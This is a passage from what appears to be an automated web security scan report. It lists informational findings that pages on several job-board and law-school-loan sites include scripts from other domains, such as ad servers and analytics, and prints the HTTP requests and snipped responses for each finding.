Date: Fri, 21 Jan 2011 22:28:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ajhbe62huej7qoq1voq8lsteu4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 118144

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.364. http://www.internshipcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.internshipcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.internshipcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:49 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ol3jscv0r1flgbhg63mnc21c14; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 132111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.365. http://www.j2eecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.j2eecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.j2eecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ov4jbk2b77peoidd95qi1upha7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:54 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:54 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111694

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.366. http://www.journalismcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.journalismcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.journalismcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:09 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=bai2pstv5ao7rak55ou3up3b17; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:09 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:09 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111259

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.367. http://www.lawcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?utm_source=JDJournal&utm_medium=Banner&utm_campaign=leverage-300x250\ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=gs1oh9i6kad359a0jna6e84qs7; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 211139

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Legal Jobs | Law Jobs | Legal Job Search | Law Firm And Legal Recruiter | La
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>
   
           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.368. http://www.lawcrossing.com/article/6070/Brooklyn-Law-School/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /article/6070/Brooklyn-Law-School/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/6070/Brooklyn-Law-School/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:46 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=vl8einafm1n540cl32q4l331g3; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144794

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td valign="top"><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>
   
           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.369. http://www.lawcrossing.com/article/6154/Anne-Healy-LIDS/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /article/6154/Anne-Healy-LIDS/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/6154/Anne-Healy-LIDS/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:39 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kn84m4kfq0k9i5413blcf4rdv5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 144589

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td valign="top"><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>
   
           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.370. http://www.lawcrossing.com/images/banner/lc_bannerforjdj125x125.gif/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /images/banner/lc_bannerforjdj125x125.gif/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /images/banner/lc_bannerforjdj125x125.gif/ HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 19:41:09 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d2dplbacjvjkr67gtesru8aj04; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103110

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>
   
           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.371. http://www.lawcrossing.com/lcjssearchresults.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /lcjssearchresults.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /lcjssearchresults.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=e5iouh0ohr4puh7rj3ce3m03n5; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 19:41:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 92150

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td width="100%" align="center" height="80">
               <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>
   
           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.372. http://www.lawcrossing.com/salarysurvey/lcsalarysurvey.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawcrossing.com
Path:   /salarysurvey/lcsalarysurvey.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /salarysurvey/lcsalarysurvey.php HTTP/1.1
Host: www.lawcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 22:29:48 GMT
Server: Apache
Cache-Control: no-store, no-cache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ru8l85l763haf7r7bf41h50d6; path=/; domain=lawcrossing.com
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103222

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_path = '';
HTT
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td align="center"><script src=https://seal.verisign.com/getseal?host_name=WWW.LAWCROSSING.COM&size=L&use_flash=YES&use_transparent=YES></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<td><script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/functions.js"></script>
<script language="JavaScript" type="text/javascript" src="http://www.jdjournal.com/script/ajax.js"></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
           <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
</script>
   
           <script type="text/javascript" language="javascript" src="http://www.statcounter.com/counter/frames.js"></script>
...[SNIP]...

15.373. http://www.lawfirmstaff.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawfirmstaff.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.lawfirmstaff.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=egea78a3rqgqf8pr582hmugbv0; path=/; domain=www.lawfirmstaff.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: public
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27468

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Law Firm Placement, Legal Staff, Law Firm Jobs, Legal Placement - Law Firm S
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Law Firm Staff Jobs RSS Feed" href="http://www.lawfirmstaff.com/lfsrssjobs.php" target="_blank" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<br><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...

15.374. http://www.lawschoolloanreport.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawschoolloanreport.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.lawschoolloanreport.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=nivvn9c4qv4ger2d748thpv5d2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 10640


<html>
<head>
    <TITLE>Student Loan Report, Student Aid Report, Student Financial Aid Report, Federal Student Aid Report . Law School Loan Report</TITLE>
   <meta name="Description" content="Law School
...[SNIP]...
<!-- For http/www page -->
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...

15.375. http://www.lawschoolloans.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawschoolloans.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.lawschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:18 GMT
Server: Apache
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=e93dd05f80eebb1753b70ce5d0a8fbb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 226477

<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.lawschoolloans.com/script/overlibmws_scroll.js"></scrip
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- Http/WWW Google analytics code Starts Here -->
           <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
           </script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->

<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.376. https://www.lawschoolloans.com/lslprivateloan_application.php

Summary

Severity:   Information
Confidence:   Certain
